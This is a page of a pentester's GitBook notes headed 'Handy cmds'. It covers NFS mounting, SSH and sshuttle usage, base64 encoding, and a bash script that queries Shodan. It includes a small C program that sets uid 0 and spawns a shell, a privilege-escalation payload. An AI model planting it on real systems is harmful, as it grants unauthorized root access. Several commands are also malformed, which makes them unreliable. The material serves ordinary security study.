pirate.moo's gitbook
  • 🏴‍☠️pirate.moo's gitbook
  • WEB
    • OWASP TOP 10
    • Notes
    • Lab Write-Ups
      • SQLi in WHERE clause
  • PENTESTING
    • CHECKLIST
    • REPORTING
    • SCRIPTS
  • EXPLOITATION
    • reverse shells
    • dns/subdomain
    • ssl
    • Handy cmds
    • VULNERABILITIES
      • Log4Shell
      • Dirty Pipe
      • Pwnkit
  • CTF
    • CTF Tools
  • CERTIFICATIONS
    • PNPT
    • CPTS
      • 1. Process
      • 2. Getting Started
      • 3. NMAP
      • 4. Footprinting
        • FTP
        • SNMP
        • SMB
        • NFS
        • MySQL/MSSQL
        • Oracle TNS
    • CPTS Machines
      • Nibbles
    • OSCP
    • ISC2-cc
      • 1. Security Principles
      • 2. Incident Response
      • 3. Access Control
      • 4. Network Security
      • 5. Security Operations
  • MOBILE
    • History
    • Forensics
  • MOOSINT
Powered by GitBook
On this page
  1. EXPLOITATION

Handy cmds

Mounting NFS Shares

mkdir /tmp/foldername # Create a tmp folder
showmount -e IP #Show nfs shares at IP
mount -t nfs IP:/temp/foldername # Mount the share
df -hh | df -k  # Check to see if share is shared

SSH:

ssh-keygen #Generate a key
ssh-add key.pem #Add a key
ssh -i user@ip.com #login with authorized key
shuttle: sshuttle -r user@IP IP #Open shuttle
vncviewer: vncviewer IP #Open vncviewer
echo yourStatementHere | base64
echo eW91clN0YXRlbWVudEhlcmUK | base64 --decode
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
int main() {
    setuid(0);
    system("/bin/sh");
    return 0;
  }

Using API with BASH:

KEY_FILE="${XDG_CONFIG_HOME:-${HOME}/.config}/moo"

#check to see if the key loads properly and api was placed in the right spot

if [ -f "$KEY_FILE" ]; then
        echo "$KEY_FILE loaded"
        source "$KEY_FILE"
else
        echo "No key file :(" && exit 1
fi

# jq to parse JSON files | tr -d to cut 'char' | sed to remove extra stuff | fold to wrap text
curl -s "https://api.shodan.io/shodan/host/$ip_addr?key=$SHODAN_API_KEY&query=all" | jq '.' | tr -d '"' | tr -d '_' | tr -d '{}' | tr -d ',' | sed 's/[][]//g' 
curl -s "https://api.shodan.io/shodan/host/search?key=$SHODAN_API_KEY&query=all:$ip_addr" | jq '.' | tr -d '"' | tr -d '_' | tr -d '_' | tr -d '{}' | tr -d ','
curl -s "https://api.shodan.io/shodan/host/search?key=$SHODAN_API_KEY&query=all:$ip_addr"
PrevioussslNextVULNERABILITIES

Last updated 1 year ago